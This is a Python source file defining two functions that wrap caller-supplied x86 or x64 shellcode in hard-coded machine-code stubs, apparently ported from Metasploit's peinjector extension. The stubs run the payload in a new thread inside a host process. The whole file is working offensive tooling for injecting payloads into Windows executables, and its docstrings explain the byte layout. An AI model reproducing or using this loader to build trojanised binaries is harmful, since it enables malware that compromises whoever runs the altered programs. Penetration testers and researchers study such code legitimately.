def add_thread_x86(payload: bytes) -> bytes:
    """
    Wrap an x86 ``payload`` in a stub that starts it in a new thread.

    The stub bytes are copied from Metasploit's peinjector extension (link
    below) and are treated as opaque data here; only the two 4-byte
    little-endian length fields are computed at call time.

    Args:
        payload: raw x86 shellcode bytes that the stub will run.

    Returns:
        ``stackpreserve + thread + shellcode``: the fixed prefix, the stub
        (with ``len(payload)`` embedded), and ``payload`` preceded by a
        fixed 5-byte prefix.

    Raises:
        OverflowError: from ``int.to_bytes`` when ``len(payload)`` or
        ``len(payload) + 5`` does not fit in 4 bytes.

    https://github.com/rapid7/metasploit-framework/blob/03dc2317da8dc18a47e9c144910844139324aa9c/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb#L50
    """
    # Fixed prefix; the variable name is kept from the upstream source.
    stackpreserve = b"\x90\x90\x60\x9c"
    # First half of the stub, terminated by the payload length as a 4-byte
    # little-endian field.  NOTE(review): keep these literals byte-identical
    # to the upstream commit linked above; any edit changes the emitted code.
    thread = (
        b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
        + b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
        + b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
        + b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
        + b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
        + b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
        + b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
        + b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
        + b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
        + b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
        + b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
        + b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
        + b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
        + b"\x5D\x90\xBE"
    ) + len(payload).to_bytes(4, "little")
    # The caller's payload with a fixed 5-byte prefix.
    shellcode = b"\xE8\xB7\xFF\xFF\xFF" + payload
    # Second half of the stub, terminated by the length of ``shellcode``
    # (payload plus its 5-byte prefix) as a 4-byte little-endian field.
    thread += (
        b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
        + b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
        + b"\x89\xF1\xeb\x44\x90\x5e\x90\x90\x90\xF2\xA4\xE8\x20\x00\x00"
        + b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
        + b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
        + b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
        + b"\x58\x58\x90\x61\xe9"
    ) + len(shellcode).to_bytes(4, "little")
    return stackpreserve + thread + shellcode
def add_thread_x64(payload: bytes) -> bytes:
    """
    Wrap an x64 ``payload`` in a stub that starts it in a new thread.

    (The original docstring said "x86"; this is the x64 counterpart of
    ``add_thread_x86`` and follows the same layout.)  The stub bytes are
    copied from Metasploit's peinjector extension (link below) and are
    treated as opaque data here; only the 4-byte little-endian length
    fields are computed at call time.

    Args:
        payload: raw x64 shellcode bytes that the stub will run.

    Returns:
        ``stackpreserve + thread + shellcode``: the fixed prefix, the stub
        (with ``len(payload)`` embedded twice and ``len(payload) + 5``
        once), and ``payload`` preceded by a fixed 5-byte prefix.

    Raises:
        OverflowError: from ``int.to_bytes`` when ``len(payload)`` or
        ``len(payload) + 5`` does not fit in 4 bytes.

    https://github.com/rapid7/metasploit-framework/blob/03dc2317da8dc18a47e9c144910844139324aa9c/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb#L95
    """
    # Fixed prefix; the variable name is kept from the upstream source.
    stackpreserve = (
        b"\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
        + b"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
    )
    # Payload length as a 4-byte little-endian field; embedded twice below.
    payload_length = len(payload).to_bytes(4, "little")
    # First part of the stub.  NOTE(review): keep these literals byte-identical
    # to the upstream commit linked above; any edit changes the emitted code.
    thread = (
        b"\x90\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31"
        + b"\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48"
        + b"\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
        + b"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed"
        + b"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80"
        + b"\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48"
        + b"\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b"
        + b"\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9"
        + b"\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39"
        + b"\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        + b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
        + b"\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83"
        + b"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xe9\x57"
        + b"\xff\xff\xff\x5d\x49\xc7\xc6"
    ) + payload_length
    # The caller's payload with a fixed 5-byte prefix.
    shellcode = b"\xE8\xB8\xFF\xFF\xFF" + payload
    # Second part of the stub, again terminated by the payload length.
    thread += (
        b"\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x4C\x89\xF2\x6A"
        + b"\x00\x59\x68\x58\xa4\x53\xe5\x41\x5A\xff\xd5\x48\x89\xc3\x48"
        + b"\x89\xc7\x48\xc7\xc1"
    ) + payload_length
    # Last part of the stub, terminated by the length of ``shellcode``
    # (payload plus its 5-byte prefix) as a 4-byte little-endian field.
    # NOTE: the last two literals carry no leading ``+``; adjacent bytes
    # literals are concatenated implicitly, so the result is unchanged, but
    # adding ``+`` would match the rest of the file.
    thread += (
        b"\xeb\x43\x5e\xf2\xa4\xe8\x00\x00\x00\x00\x48\x31\xC0\x50\x50"
        + b"\x49\x89\xC1\x48\x89\xC2\x49\x89\xD8\x48\x89\xC1\x49\xC7\xC2"
        + b"\x38\x68\x0D\x16\xFF\xD5\x48\x83\xC4\x58\x9d\x41\x5f\x41\x5e"
        b"\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59\x41\x58\x5d\x5c\x5f"
        b"\x5e\x5a\x59\x5b\x58\xe9"
    ) + len(shellcode).to_bytes(4, "little")
    return stackpreserve + thread + shellcode